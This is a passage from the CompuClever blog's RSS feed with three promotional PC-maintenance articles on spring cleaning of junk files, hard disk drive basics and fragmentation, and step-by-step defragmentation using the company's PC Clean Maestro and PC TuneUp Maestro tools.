					<description><![CDATA[<p>It’s spring time. What a wonderful time of the year. We tend to feel energized from a restful winter season and it’s time to take on chores that were neglected or “to do” items that set the stage for our busy endeavors ahead. One of these tasks is cleaning your PC so that it runs efficiently. Believe it or not this process does not have to be equivalent to tearing one’s hair out and it can be very fast using the right tools. In the end you may have two important chores accomplished – a better organization of personal files and dead weight that we can refer to as “clutter” is removed.</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/spring-pc-cleaning/">Spring PC Cleaning</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="top_p">
<div class="quick_facts">It’s spring time.  What a wonderful time of the year.  We tend to feel energized from a restful winter season and it’s time to take on chores that were neglected or “to do” items that set the stage for our busy endeavors ahead.  One of these tasks is cleaning your PC so that it runs efficiently.  Believe it or not this process does not have to be equivalent to tearing one’s hair out and it can be very fast using the right tools.  In the end you may have two important chores accomplished – a better organization of personal files and dead weight that we can refer to as “clutter” is removed.</div>
</div>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="aligncenter" title="Spring PC Cleaning" src="http://www.goodhousekeeping.com/cm/goodhousekeeping/images/3e/ghk-clean-computer-de.jpg" alt="" width="753" height="502" /></p>
<p>We’re going to start off with some information on clutter and how to assess how much free space you may have on your PC.  Keep in mind that you may have plenty of free space and still have plenty of clutter on your PC.  Assessing the situation can help in determining how your PC is performing and how well it responds to some clean up!</p>
<h1>Clutter – Time to Clean</h1>
<p>By “cleaning” we are not talking about throwing away things that may have some importance.  We are referring to removing what can be considered clutter and organizing files we want to keep.  By doing so we can not only improve the performance of the PC but make our lives a lot easier in terms of accessing the files and data we need.</p>
<h1>Step 1: Assess</h1>
<p>Assess space needs – how much free space do you have remaining.  Most of us take pictures and movie files on our cameras and download them to our computer.  These add up over time and need to be stored in a safe place (or at least duplicated to your external hard drive in the event you do have sufficient space).</p>
<p>To assess the file space needs you can do the following:</p>
<div class="indent_left">
<p>1.	Open the <strong>Start</strong> menu and select <strong>Computer</strong>.  (Some Windows OS systems label this “My Computer” and with Windows 8 you have to type: “this PC” when on the Start screen and select “This PC” from the search results.)</p>
<p>2.	Locate your hard drive.  This is <strong>Local Disk (C:)</strong> or <strong>Windows (C:)</strong> for most computers.</p>
<p>3.	View the free space that is displayed for the drive.  Tip: you can also right click on the drive and select <strong>Properties</strong> to see a pie chart of the used and free space.</p>
</div>
<p>For most computers there is typically a large amount of storage for your files and you may have a lot of free space available.  If you still feel that it has been a while since you have removed unwanted files and, maybe, you feel that your PC is a bit sluggish in some ways.</p>
<div class="quick_facts">Typical symptoms of poor PC performance include:<br />
•	Slow startup time.<br />
•	Slower times to open programs, save files, close programs, and perform regular operations.<br />
•	Computer freezes or locks up.  This means that your PC does not respond or stalls as if waiting for you to do something.  It can be more frequently experienced when more than one program is running at a time.<br />
•	Computer crashes or shuts down on its own.<br />
•	Redundant programs can lead to excessive action behind the scene (taking up PC processing).</div>
<p>If your feel any of this applies to you and you want to take advantage of a clean PC system, we highly recommended removing clutter from your PC.</p>
<h1>Step 2: Backup</h1>
<p>Begin by backing up and organizing files (media files especially) that need to be put on to an external hard drive.  This article deals with removal – permanent removal – of unwanted items.  The key is “unwanted”.  We strongly recommend that you make a copy of all files that are important to you.  The price of external hard drives makes this a no-brainer and hard drives available these days are often more space than what the average person needs – some are now terabyte in size (1,000 GBs).  The added advantage of having a good backup and storage strategy is that you are working toward optimizing free space on your PC.</p>
<div class="quick_facts">Recommendation:  Try out <a href="http://www.microsoft.com/en-ca/download/details.aspx?id=15155" target="_blank">Microsoft’s Sync Toy</a>.   This free tool makes synchronizing your files fast and easy.  You can avoid duplication and feel assured that you haven’t missed backing up all your files.</div>
<h1>Step 3: Deal With the Junk:</h1>
<p>There are files that get onto your computer without us even knowing how they got there.  Here’s how they likely got there:</p>
<div class="quick_facts">
<ul>
<li>Unwanted files get stored on your PC when you browse the Internet.  Web browsers produce caches of files when you surf the net.</li>
<li>Unwanted files get stored on your PC during downloads.  Programs create Temp folders and files to temporarily use during an installation.</li>
<li>Remnants remain when you uninstall.  Items are not always removed when uninstalling programs.  This can happen even after you have successfully completed the un-installation of a program.  These are sometimes referred to as “orphan” strings and files which are left in the registry and on the hard drive.</li>
<li>Getting files in email attachments and installing applications from the Internet.  Some of these become outdated or are not put into use.</li>
</ul>
</div>
<p>These unwanted items build up from regular day-to-day activities.  The result of too many junk files and unnecessary programs is that these items take up disk space and can use available memory thereby resulting in PC slowdown and unexpected behaviours.  Maybe the real question though is: how do you best remove these especially when considering that it is a task that you need to do periodically – it’s not a one-time fix.</p>
<p><strong>Use the Right Tool</strong></p>
<p>We are looking at simplifying the process by using automated tools that do the job quickly and efficiently.  PC Clean Maestro is designed to clean and remove unwanted items such as recycle bin items, temporary Internet download files, items in the Windows Temp folder, and other cache and system files.  All of these items and more can be scanned and cleaned.  After performing a quick scan a complete summary is provided and the total size of the junk items is tallied up.  In some cases, this can add up to gigabytes of “junk” and can account for 5 -10% of your disk capacity.</p>
<p>With PC Clean Maestro (the free functionality of PC Clean Maestro) you can remove junk files and uninstall programs so as to free up space.  By doing so you clear up PC clutter which can bog down the system and lead to poor system performance.  Some best practices are provided so that your experience can be simplified and more trouble-free.</p>
<div class="indent_left"><strong>Note</strong>:  If it has been a while since you last opened your PC Clean Maestro you may have a message displayed asking you to update to the latest version.  Receiving free updates are part of what is offered with the registered version package and the update is fast!</div>
<p>The Instructions: There are three areas of cleaning that can take place using the Clean Tool.  We are staying focused on the free aspects of PC Clean Maestro.  The following instructions detail how to remove Junk files from your PC.</p>
<ol>
<li>First you need to open the program.  The window will appear as seen here:<img decoding="async" loading="lazy" class="aligncenter" title="PC Clean Maestro" src="https://www.compuclever.com/images/pccm-scan-settings_lg.jpg" alt="" width="482" height="315" /></li>
<li>Select items to clean.  We are going to focus on Junk items only so clear the checkboxes for Personal Security and Privacy.  You can then review and select any of the items in the Junk section (Installer Files, Log Files, Temp Files, etc.).<br />
<strong>Note: </strong> You can refer to the help file for instructions on how to display all the individual items that are categorized.  You can also get information on the three state check box system.</li>
<li>Initiate the scan using the “Start” button.</li>
<li>Review and Clean.  A summary of the scan is displayed including the number of detected items found in each category, the size that can be reclaimed, and a “Details” link.  The link will provide the complete list of items found and the location of each item.  You can clear any selected items before moving on to the next step.</li>
<li>Clean.  Click the “Clean” button to permanently delete these junk items.</li>
</ol>
<p><strong>Best Practices</strong>:</p>
<p>Create an automated schedule.  Use the Options button in the Main window and select the Clean Scan Schedule.  From here you can configure when you want an automated scheduled scan to run.</p>
<h1>In Summary – Lean &amp; Clean:</h1>
<p>We’ve covered the basics of cleaning your PC and we’ve introduced one aspect of PC Clean Maestro.  It’s also great to know that anyone can use all the functionality presented here for free.  There are many other features relating to security and privacy that are available for registered users and we will provide steps and tips on how to use these in our articles.</p>
<p>We hope this article has helped gain some insight and offered you some effective strategies on cleaning your PC.  We will continue to provide story lines like this that benefit all of us and we will describe them in a manner that is within reach of everyday computer users.  If you have some ideas of topics you would like us to cover, email us at: newsletter@compuclever.com</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/spring-pc-cleaning/">Spring PC Cleaning</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Hard Disk Drive Basics</title>
		<link>https://www.compuclever.com/posts/hard-disk-drive-basics/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=hard-disk-drive-basics</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Wed, 16 Jan 2013 12:34:27 +0000</pubDate>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[improving performance]]></category>
		<category><![CDATA[increasing speed]]></category>
		<category><![CDATA[Newsletter]]></category>
		<category><![CDATA[PC hardware]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=720</guid>

					<description><![CDATA[<p>The Hard Disk Drive (HDD) is the main storage device for your PC; it is the mechanism that writes and reads data on the hard disk. Disk fragmentation is a condition which occurs when files are stored in scattered sections throughout the disk.  This occurs as a result of frequently creating, deleting, and modifying files.  PC performance degrades when it experiences fragmentation.</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/hard-disk-drive-basics/">Hard Disk Drive Basics</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="top_p">
<div class="quick_facts">An effective disk defragmenter is a vital utility for all PC users who take an active role in improving system performance.  We have created two informational articles to cover this important topic thoroughly but in terminology that all computer users can understand.  This article examines Hard Disk Drives and how they become fragmented.  <a href="https://www.compuclever.com/posts/disk-defragmentation-and-pc-performance/" target="_blank">The follow up article</a> will detail how fragmentation can impact system performance and how defragmentation and best practices can restore PC performance.</div>
<p>The Hard Disk Drive (HDD) is the main storage device for your PC; it is the mechanism that writes and reads data on the hard disk.  The HDD components consist of one or more drive platters sealed within a casing.  These drives connect to the motherboard of the computer through the use of internal data transfer and power cables.</p>
</div>
<p>The components within the drive include:</p>
<ul>
<li><strong>Head Actuator</strong>: controls the actuator arm.</li>
<li><strong>Read/Write Actuator Arm</strong>: is similar to the arm of a record player; as the platter is spinning the arm locates and accesses the data needed so it can be read, written (edited), and deleted.</li>
<li><strong>Read/Write Head</strong>: this is the device at the end of the actuator arm and is used to write or read the data on the platter.</li>
<li><strong>Spindle</strong>: holds the platter in place.</li>
<li><strong>Platter</strong>: one or more disks (aluminum, glass, or ceramic) that stores the data.  These are coated with a magnetic media and platters rotate at various rotations per minute based on the model of the Hard Disk Drive.<a href="https://www.compuclever.com/posts/wp-content/uploads/inside-harddrive.gif"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-721" title="Hard disk components" src="https://www.compuclever.com/posts/wp-content/uploads/inside-harddrive.gif" alt="" width="400" height="352" srcset="https://www.compuclever.com/posts/wp-content/uploads/inside-harddrive.gif 400w, https://www.compuclever.com/posts/wp-content/uploads/inside-harddrive-300x264.gif 300w" sizes="(max-width: 400px) 100vw, 400px" /></a></li>
</ul>
<p>Another critical component is the Disk Controller which contains the necessary instructions for the drive.</p>
<p>Here’s How It Works: Data is transferred to and from the HDD and interpreted by the Disk Controller which acts like the conductor as it instructs the hard drive in terms of what to do and how the internal components needs to function.  When you instruct your PC to read or write data, the operating system examines the hard drives’ File Allocation Table (FAT) to examine the available space and location.  Once the space is identified, the Disk Controller gives instruction to the Read/Write Actuator Arm and to align the Read/Write Head.  Files are often spread out in different areas and the Read/Write Head needs to travel to each location to access the required data.</p>
<p><img decoding="async" loading="lazy" class="size-medium wp-image-769 alignleft" title="Hard disk tracks and sectors" src="https://www.compuclever.com/posts/wp-content/uploads/IC306536-300x219.jpg" alt="" width="300" height="219" srcset="https://www.compuclever.com/posts/wp-content/uploads/IC306536-300x219.jpg 300w, https://www.compuclever.com/posts/wp-content/uploads/IC306536.jpg 523w" sizes="(max-width: 300px) 100vw, 300px" />In this process, the data is stored magnetically like how a cassette tape works.  In fact, both use the same recording techniques.  The magnetic medium can be erased and re-written easily.  If your PC needs data it would read the magnetic polarities on the platter.  One side is a “0” and the other a “1” – this is referred to as binary data.  Unlike cassette tapes, the Read/Write Head never touches the disk and consumer PC platters typically spin at 7,200 rpm; a speed of up to 3,000 inches per second.  Also, much more information can be read to a disk in much smaller space than cassettes.  Both speed and precision account for the ability to record so much data in such small magnetic domains.</p>
<p>The Platter:  The data that is written onto the platter is stored in tracks and sectors.  A track is a concentric circle on the platter and a sector is a wedge, a pie-shaped section on the platter.  Where these two shapes intersect is a single section on a single track which is known as a “track sector”.  File systems, which work to organize these massive amounts of data, will organize groups of sectors into clusters.  These terms are useful to familiarize yourself with when looking at the process of fragmentation.</p>
<h2>Fragmentation</h2>
<p><img decoding="async" loading="lazy" class="size-full wp-image-734 alignright" style="margin-top: 10px; margin-left: 20px;" title="Disk fragmentation" src="https://www.compuclever.com/posts/wp-content/uploads/al_boostspeed5_2.jpg" alt="" width="341" height="198" srcset="https://www.compuclever.com/posts/wp-content/uploads/al_boostspeed5_2.jpg 341w, https://www.compuclever.com/posts/wp-content/uploads/al_boostspeed5_2-300x174.jpg 300w" sizes="(max-width: 341px) 100vw, 341px" /></p>
<p>Disk fragmentation is a condition which occurs when files are stored in scattered sections throughout the disk.  This occurs as a result of frequently creating, deleting, and modifying files.  The operating system uses what free space is available including those areas of the disk that become available when items are moved or deleted.  When files do not fit exactly they are broken into pieces; into non-contiguous clusters.  Working with large files and numerous files can exacerbate this condition.  One of the negative results of this is performance degradation.</p>
<p>How it happens:  Storing new data, deleting data, and making modifications to files are all normal day-to-day occurrences with PC use.  Disk fragmentation occurs over time as a result of these activities.  Here is an example.  You download a Word document from email.  It is stored in available free space on your disk.  Each time you make a change to the file and save the changes, the data is stored in a location different from the original.  Further revisions to the file are again stored in different locations.  Not only is the disk fragmented over time, so are the files that are modified in this way.  The PC has to search for these fragments in different places and as a result the computer performance is slower than what it could be if the files were stored in a sequential fashion.</p>
<p>In other cases one file may be written to the disk in numerous places of the disk as a result of the size of the file or the available space on the disk.  Also, groups of files that are needed to be read sequentially (audio/visual gaming media, resource files for an application, and more) are often stored in a non-contiguous or fragmented order. Over time even files that are stored in a contiguous fashion may become fragmented as some files are deleted or updates are made.  In these cases files that are unrelated are filled into the gaps that are created.  Many of the modern systems on the market today suffer less from fragmentation due to the size of the disk with respect to capacity.  If there is considerable free space available, fragmentation is less likely to be as severe.</p>
<h2>Summary</h2>
<p>Fragmentation occurs with regular PC use.  While some activities such as installing / uninstalling large applications and media files can result in more rapid fragmentation, gradual fragmentation can occur from online surfing and the use of office applications.</p>
<p>To learn how a performance degrades when a PC experiences fragmentation and be proactive with regular defragmentation that suites your computing day-to-day use, read the following articles:</p>
<ul>
<li><a href="https://www.compuclever.com/posts/disk-defragmentation-and-pc-performance/" target="_blank">Defragmentation and Optimization</a></li>
<li><a href="https://www.compuclever.com/posts/how-to-defrag-your-hard-drives/" target="_blank">How to defrag your hard drives</a></li>
</ul>
<p>&nbsp;</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/hard-disk-drive-basics/">Hard Disk Drive Basics</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>How Defrag Hard Drives to Speed Up Your PC</title>
		<link>https://www.compuclever.com/posts/how-to-defrag-your-hard-drives/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=how-to-defrag-your-hard-drives</link>
		
		<dc:creator><![CDATA[Andy Thompson]]></dc:creator>
		<pubDate>Tue, 15 Jan 2013 21:02:16 +0000</pubDate>
				<category><![CDATA[improving performance]]></category>
		<category><![CDATA[increasing speed]]></category>
		<category><![CDATA[Newsletter]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Windows tips]]></category>
		<guid isPermaLink="false">http://www.compuclever.com/posts/?p=690</guid>

					<description><![CDATA[<p>This article contains a full layout of how to dramatically improve the health and performance of your PC by using the PC TuneUp Maestro Defrag Disk utility.  We will cover, in brief, preparing your PC by removing unwanted files.  Next we will lay out step-by-step instructions for using the Disk Defrag tool.  To wrap up, we will cover some additional tips and features such as frequency of defragmentation and automation of the Defrag tool.</p>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/how-to-defrag-your-hard-drives/">How Defrag Hard Drives to Speed Up Your PC</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="top_p">
<div class="quick_facts">One of the most effective ways of speeding up your PC is to defrag your hard drive. This article contains a full layout of how to dramatically improve the health and performance of your PC by using the PC TuneUp Maestro Defrag Disk utility. We will cover, in brief, preparing your PC by removing unwanted files. Next we will lay out step-by-step instructions for using the Disk Defrag tool. To wrap up, we will cover some additional tips and features such as frequency of defragmentation and automation of the Defrag tool. So, let’s begin.</div>
</div>
<p><a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-2825" src="https://www.compuclever.com/posts/wp-content/uploads/blog-powersuite-trial-download-1.jpg" alt="Download free defrag tool" width="650" height="auto" /></a></p>
<p>You can get lots of information on the subject of defragmentation in the following articles:</p>
<ul>
<li><a href="https://www.compuclever.com/posts/hard-disk-drive-basics/" target="_blank">Hard Drive Basics</a></li>
<li><a href="https://www.compuclever.com/posts/disk-defragmentation-and-pc-performance/" target="_blank">Defragmentation and Optimization</a></li>
</ul>
<h2>Best Practices</h2>
<p>There are a few best practice recommendations to outline from the start.</p>
<p><strong>Clean Up:</strong> Before you can organize, it is always best to do a quick clean up.  This is also true with your Hard Disk Drive (HDD).  If you stop to think about it, the defragment process works to organize scattered data caused from installing, modifying, and deleting files and software.  Before doing a defrag is the best time to do a quick removal of junk items including files in the recycle bin, temp files (unwanted items that are created as temporary storage), outdated cache items, log files, and more.  With even <a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank">the free trial version of PC Clean Maestro</a> you can do this quickly and easily.</p>
<p><strong>Close Applications:</strong> It is best to close down any applications that are running.  Software programs can be a challenge for Defrag tools as files are altered or created through regular program operations (even ones that occur behind the scenes from a running application).</p>
<p><strong>Give it Time: </strong>We recommend leaving the PC alone during the defrag process.  Not only will you experience poor system performance during this time (as the HDD is engaged in reorganizing data), but the act of changing files through the operations you make could be challenging for the defragmentation process as it has to deal with unexpected file and data revisions.  It is best to shut down all running programs and run the Defrag tool in a “down time” such as late evening or at night.  Having a Defrag scheduler is very handy in these cases and we will cover this at the end of this article.</p>
<p><a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-2825" src="https://www.compuclever.com/posts/wp-content/uploads/blog-powersuite-trial-download-1.jpg" alt="Download free defrag tool" width="650" height="auto" /></a></p>
<h2>Steps to Defrag</h2>
<p>We have outlined four easy steps with screenshots to guide you easily through the defragmentation process.</p>
<ol>
<ol>
<li><strong>Clean up unwanted “junk” files</strong></li>
</ol>
</ol>
<p>As stated above, we highly recommend cleaning all unwanted files with the use of <a title="Click to learn more about PC Clean Maestro" href="https://www.compuclever.com/products/power-suite/lp/" target="_blank">PC Clean Maestro</a>.  The steps to take are easy – it involves scanning your PC, examining the list of detected items, and cleaning the items.</p>
<ol>
<ol>
<li><strong>Select the volume</strong></li>
</ol>
</ol>
<p>You can select any and all volumes that are listed.  In the case that your hard drive has several distinct partitions, each one will be displayed here.  External drives and storage media devices (such as flash cards, USB sticks, external hard drives, etc.), are not included in the list of identified volumes.  In the case of Solid State Drives (SSD), &#8211; these are data storage devices that employ integrated circuit assemblies as memory to store data in a persistent manner.  They are also characterized by not having any moving mechanical parts and can often be found in laptops &#8211; PC TuneUp Maestro does not differentiate these from other volumes.</p>
<figure id="attachment_707" aria-describedby="caption-attachment-707" style="width: 614px" class="wp-caption alignnone"><a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank"><img decoding="async" loading="lazy" class="size-full wp-image-707 " title="Select volume" src="https://www.compuclever.com/posts/wp-content/uploads/defrag03_resize.jpg" alt="" width="614" height="463" srcset="https://www.compuclever.com/posts/wp-content/uploads/defrag03_resize.jpg 614w, https://www.compuclever.com/posts/wp-content/uploads/defrag03_resize-300x226.jpg 300w" sizes="(max-width: 614px) 100vw, 614px" /></a><figcaption id="caption-attachment-707" class="wp-caption-text">PC TuneUp Maestro &#8211; Defrag : Select disk volume</figcaption></figure>
<p><span style="text-decoration: underline;">Recommendation:</span> Do not include an SSD to be fragmented.  These types of drives are not meant to be defragmented.  Defragmentation will cause wear as additional writes are made to the flash cells which have a limited cycle life.  Also, these drives experience very little fragmentation.</p>
<ol>
<ol>
<li><strong>Scan for fragmentation</strong></li>
</ol>
</ol>
<p>The first stage of defragmentation involves scanning the selected volume (or volumes) to assess the amount of fragmentation.  In this way you can make an informed choice of whether to go ahead with the defrag process.  When you are ready you can click the “Start” button.  While the scan is being performed you can see a visual representation of the data secotrs on your disk.  Each of these is assigned a color to identify it as empty, not fragmented, unmovable, fragmented, busy or reserved space.</p>
<figure id="attachment_708" aria-describedby="caption-attachment-708" style="width: 617px" class="wp-caption alignnone"><a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank"><img decoding="async" loading="lazy" class="size-full wp-image-708 " title="Fragmentation scan in progress..." src="https://www.compuclever.com/posts/wp-content/uploads/defrag05_resize.jpg" alt="" width="617" height="464" srcset="https://www.compuclever.com/posts/wp-content/uploads/defrag05_resize.jpg 617w, https://www.compuclever.com/posts/wp-content/uploads/defrag05_resize-300x225.jpg 300w" sizes="(max-width: 617px) 100vw, 617px" /></a><figcaption id="caption-attachment-708" class="wp-caption-text">PC TuneUp Maestro &#8211; Defrag: Scan for disk fragmentation</figcaption></figure>
<p>When the scan is complete the results are displayed. The most important piece of information is the overall percentage of fragmentation.  If there are only a few percentages of fragmentation you can rest easy and run this process another time (in a few weeks for example).  If more defragmentation is identified you need to continue to the next step.  For a PC that has been in use a long time and has not been defragmented, you will likely experience considerable fragmentation.</p>
<p>One other point to mention… you need to examine how much free space is available.  There is a column in the summary table that displays this as well.  While many Defrag tools require 15% free space, PC TuneUp Maestro can get the job done with at least 3% free space.  If you have very little free space (less than 3%), you need to re-visit step 1.</p>
<ol>
<ol>
<li><strong>Defrag – Quick and Full</strong></li>
</ol>
</ol>
<p>You can now begin to defragment your HDD. You can click the “Defrag Now” button and the default action (Quick or Full Defrag) will initiate. Keep in mind that you can choose to perform a Quick or a Full Defrag and you can select which of these you want as the default action by using the drop down arrow (when you first run the program the default action is set to Full Defrag).</p>
<figure id="attachment_709" aria-describedby="caption-attachment-709" style="width: 640px" class="wp-caption alignnone"><a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank"><img decoding="async" loading="lazy" class="size-full wp-image-709 " title="Choose between Quick Defrag and Full Defrag" src="https://www.compuclever.com/posts/wp-content/uploads/defrag07_resize.jpg" alt="" width="640" height="504" srcset="https://www.compuclever.com/posts/wp-content/uploads/defrag07_resize.jpg 640w, https://www.compuclever.com/posts/wp-content/uploads/defrag07_resize-300x236.jpg 300w" sizes="(max-width: 640px) 100vw, 640px" /></a><figcaption id="caption-attachment-709" class="wp-caption-text">PC TuneUp Maestro &#8211; Defrag: Quick vs. Full</figcaption></figure>
<ul>
<li><em> Quick Defrag:</em> You have the option of saving some time by performing a Quick Defrag – a good choice if there is a lot of available space, the percentage of fragmentation is low, and you do not have a lot of free “down” time and want to use your PC.When performing a Quick Defrag, PC TuneUp Maestro does not re-allocate free space on the volume in order to defrag items. The best example to visualize is having ten fragmented files and only three can be moved to areas where the free space already exists. It would be like having a picture puzzle and only moving joined pieces to free space rather than shuffling empty space to create larger free space.</li>
<li><em>Full Defrag: </em> This option is more thorough and will take more time. When performing a Full Defrag, PC TuneUp Maestro will re-allocate free space on the volume to get the job done. It would be like having a picture puzzle and efficiently organizing the free spaces so that all joined pieces can be moved to space that has been made available.The time this process takes depends on many factors including how defragmented the files are, how large the defragmented files are, and the number of files. Keep in mind the point made above: it is best to leave your PC alone during this process. You need to set aside some time for this to complete. If you want to perform the Full Defrag another time then cancel the procedure. Simply pick a time when you are away from the computer. You can even use the Disk Defrag Schedule to automate all of this.</li>
</ul>
<p><a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-2825" src="https://www.compuclever.com/posts/wp-content/uploads/blog-powersuite-trial-download-1.jpg" alt="Download free defrag tool" width="650" height="auto" /></a></p>
<h2>Additional</h2>
<div>
<p>You now have the fundamental knowledge required to perform defragmentation on your PC.  There are only a few additional tips to pass along as you get better and better at performing this function.</p>
</div>
<ol>
<li><strong>Regular Defrag – Frequency: </strong> How often to defragment your PC is going to depend on how often you and your family use your PC and what kind of activities are performed. If there is a lot of time being spent on the PC with a lot of installation of software and downloading and editing of large files (such as multi-media files), you will need to examine the fragmentation levels on a regular basis – maybe every week or two weeks. If you notice that you need to do this on a regular basis and would prefer to have this run when your PC is on and you are not using it, we recommend using the Schedule tool.</li>
<li><strong>Schedule / Automate: </strong> You can schedule PC TuneUp Maestro to run on a regular basis. There are several options you can set including which volume(s), what time of day, day of the week, and whether you would like to simply scan your PC to assess the defragmentation or you would like to have an automatic scan and defragmentation.
<p><figure id="attachment_710" aria-describedby="caption-attachment-710" style="width: 614px" class="wp-caption alignnone"><a href="https://www.compuclever.com/products/power-suite/lp/" target="_blank"><img decoding="async" loading="lazy" class="size-full wp-image-710 " title="Set auto scan and defrag schedule" src="https://www.compuclever.com/posts/wp-content/uploads/defrag11_resize.jpg" alt="" width="614" height="462" srcset="https://www.compuclever.com/posts/wp-content/uploads/defrag11_resize.jpg 614w, https://www.compuclever.com/posts/wp-content/uploads/defrag11_resize-300x225.jpg 300w" sizes="(max-width: 614px) 100vw, 614px" /></a><figcaption id="caption-attachment-710" class="wp-caption-text">PC TuneUp Maestro: Schedule automatic disk defrag scan</figcaption></figure></li>
</ol>
<div class="bottom_p">
<p>Now that you know the process of defragmentation, you are well underway to taking on one of the most influential steps in improving your PC performance – disk defragmentation.  We plan on providing you even more PC optimization skills.  It is our hope that this and future articles are useful to you and together we can optimize the functioning and overall health of you PC.</p>
</div>
<p>The post <a rel="nofollow" href="https://www.compuclever.com/posts/how-to-defrag-your-hard-drives/">How Defrag Hard Drives to Speed Up Your PC</a> appeared first on <a rel="nofollow" href="https://www.compuclever.com/posts">CompuClever</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
